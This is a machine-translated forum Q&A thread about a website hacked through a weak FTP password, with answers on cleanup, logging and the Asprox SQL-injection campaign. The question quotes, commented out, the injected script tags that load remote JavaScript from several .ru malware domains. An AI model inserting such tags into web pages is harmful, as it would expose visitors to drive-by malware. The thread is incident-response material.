security - Mon site Web a été piraté. Que dois-je faire?

Translate

Mon père m'a appelé aujourd'hui et m'a dit que les gens qui se rendaient sur son site Web recevaient 168 virus essayant de télécharger sur leurs ordinateurs. Il n'est pas du tout technique et a tout construit avec un éditeur WYSIWYG.

J'ai ouvert son site et consulté la source, et il y avait une ligne de Javascript inclus en bas de la source juste avant la balise HTML de fermeture. Ils ont inclus ce fichier (parmi beaucoup d'autres):http://www.98hs.ru/js.js<-DÉSACTIVEZ JAVASCRIPT AVANT D'ALLER À CETTE URL.

Alors je l'ai commenté pour l'instant. Il s'avère que son mot de passe FTP était un mot de dictionnaire simple de six lettres, donc nous pensons que c'est comme ça qu'il a été piraté. Nous avons changé son mot de passe en une chaîne non-mot de plus de 8 chiffres (il n'irait pas pour une phrase de passe car il est un typeur hunt-n-peck).

j'ai fait unwhois sur 98hs.ruet trouvé qu'il est hébergé à partir d'un serveur au Chili. Il y a en fait une adresse e-mail qui lui est associée, mais je doute sérieusement que cette personne soit le coupable. Probablement juste un autre site qui a été piraté ...

Je n'ai aucune idée de ce qu'il faut faire à ce stade car je n'ai jamais traité de ce genre de chose auparavant. Quelqu'un a des suggestions?

Il utilisait le ftp non sécurisé de plain Jane via webhost4life.com. Je ne vois même pas un moyen dedosftp sur leur site. Je pense que son nom d'utilisateur et son mot de passe ont été interceptés?

Donc, pour rendre cela plus pertinent pour la communauté, quelles sont les étapes à suivre / les meilleures pratiques à suivre pour protéger votre site Web contre le piratage?

Pour mémoire, voici la ligne de code qui "par magie" a été ajoutée à son fichier (et qui n'est pas dans son fichier sur son ordinateur - je l'ai laissée commentée juste pour être sûr qu'elle ne fera rien sur cette page, même si je suis sûr que Jeff se garderait de cela):

<!--script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script-->
This question and all comments follow the "Attribution Required."

Toutes les réponses

Translate

Essayez de rassembler autant d'informations que possible. Vérifiez si l'hôte peut vous fournir un journal indiquant toutes les connexions FTP qui ont été établies avec votre compte. Vous pouvez les utiliser pour voir si c'est même une connexion FTP qui a été utilisée pour effectuer le changement et éventuellement obtenir une adresse IP.

Si vous utilisez un logiciel préemballé comme Wordpress, Drupal ou tout autre élément que vous n'avez pas codé, il peut y avoir des vulnérabilités dans le code de téléchargement qui permettent ce type de modification. S'il est personnalisé, vérifiez tous les emplacements où vous autorisez les utilisateurs à télécharger des fichiers ou à modifier des fichiers existants.

La deuxième chose serait de faire un vidage du site tel quel et de tout vérifier pour d'autres modifications. C'est peut-être juste une seule modification qu'ils ont faite, mais s'ils sont entrés via FTP, qui sait ce qu'il y a d'autre.

Rétablissez votre site à un bon état connu et, si nécessaire, passez à la dernière version.

Vous devez également prendre en compte un niveau de rendement. Vaut-il la peine d'essayer de retrouver la personne ou s'agit-il d'un endroit où vous vivez, apprenez et utilisez des mots de passe plus forts?

La source
Translate

Je sais que c'est un peu tard dans le jeu, mais l'URL mentionnée pour le JavaScript est mentionnée dans une liste de sites connus pour avoir fait partie de la résurgence des robots ASPRox qui a commencé en juin (du moins c'est à ce moment-là que nous avons été signalés avec il). Quelques détails à ce sujet sont mentionnés ci-dessous:

http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx

Ce qui est désagréable à ce sujet, c'est qu'en fait, chaque champ de type varchar de la base de données est "infecté" pour cracher une référence à cette URL, dans laquelle le navigateur obtient un minuscule iframe qui le transforme en bot. Un correctif SQL de base pour cela peut être trouvé ici:

http://aspadvice.com/blogs/programming_shorts/archive/2008/06/27/Asprox-Recovery.aspx

Ce qui est effrayant, c'est que le virus recherche dans les tables système des valeurs à infecter et que de nombreux plans d'hébergement partagé partagent également l'espace de la base de données pour leurs clients. Donc, très probablement, ce n'est même pas le site de votre père qui a été infecté, mais le site de quelqu'un d'autre dans son cluster d'hébergement qui a écrit un code médiocre et a ouvert la porte à une attaque par injection SQL.

S'il ne l'a pas encore fait, j'enverrais un e-mail URGENT à leur hôte et leur donnerais un lien vers ce code SQL pour réparer l'ensemble du système. Vous pouvez réparer vos propres tables de base de données affectées, mais il est fort probable que les bots qui sont à l'origine de l'infection passeront à nouveau par ce trou et infecteront tout le lot.

J'espère que cela vous donnera plus d'informations sur lesquelles travailler.

EDIT: Une dernière réflexion rapide, s'il utilise l'un des outils de conception en ligne des hôtes pour créer son site Web, tout ce contenu est probablement assis dans une colonne et a été infecté de cette façon.

La source
Translate

Vous dites que votre père utilisait un outil de publication de site Web.

Si l'outil de publication publie de son ordinateur vers le serveur, il se peut que ses fichiers locaux soient propres et qu'il ait juste besoin de republier sur le serveur.

Il devrait voir s'il existe une méthode de connexion différente à son serveur par rapport au simple FTP, cependant ... ce n'est pas très sécurisé car il envoie son mot de passe en texte clair sur Internet.

La source
Translate

Avec un mot de passe de six mots, il a peut-être été forcé. C'est plus probable que son ftp soit intercepté, mais cela pourrait l'être aussi.

Commencez avec un mot de passe plus fort. (8 caractères c'est encore assez faible)

Voir si ce lien vers Internetblog sur la sécuritéest utile.

La source
Kev
Translate

Le site est-il simplement du HTML statique? c'est-à-dire qu'il n'a pas réussi à coder lui-même une page de téléchargement qui permet à toute personne passant de télécharger des scripts / pages compromis?

Pourquoi ne pas demander à webhost4life s'ils ont des journaux FTP disponibles et leur signaler le problème. Vous ne savez jamais, ils peuvent être assez réceptifs et découvrir exactement ce qui s'est passé?

Je travaille pour un hébergeur partagé et nous accueillons toujours des rapports comme ceux-ci et pouvons généralement identifier le vecteur exact de l'attaque en fonction et indiquer où le client s'est trompé.

La source
Translate

Débranchez le serveur Web sans l'arrêter pour éviter les scripts d'arrêt. Analysez le disque dur via un autre ordinateur en tant que lecteur de données et voyez si vous pouvez déterminer le coupable grâce à des fichiers journaux et des choses de cette nature. Vérifiez que le code est sûr, puis restaurez-le à partir d'une sauvegarde.

La source
Translate

Ceci est arrivé à un de mes clients récemment qui était hébergé sur ipower. Je ne sais pas si votre environnement d'hébergement était basé sur Apache, mais s'il était sûr de vérifier les fichiers .htaccess que vous n'avez pas créés, en particulier au-dessus de la racine Web et à l'intérieur des répertoires d'images, car ils ont tendance à y injecter de la méchanceté ainsi (ils redirigeaient les gens en fonction de leur origine dans la référence). Vérifiez également tout ce que vous avez créé pour le code que vous n'avez pas écrit.

La source
Translate

Nous avions été piratés par les mêmes gars apparemment! Ou des bots, dans notre cas. Ils ont utilisé l'injection SQL dans l'URL sur certains anciens sites ASP classiques que personne ne gère plus. Nous avons trouvé des adresses IP attaquantes et les avons bloquées dans IIS. Maintenant, nous devons refactoriser tous les anciens ASP. Donc, mon conseil est de jeter un coup d'œil aux journaux IIS en premier, pour déterminer si le problème se situe dans le code de votre site ou dans la configuration du serveur.

La source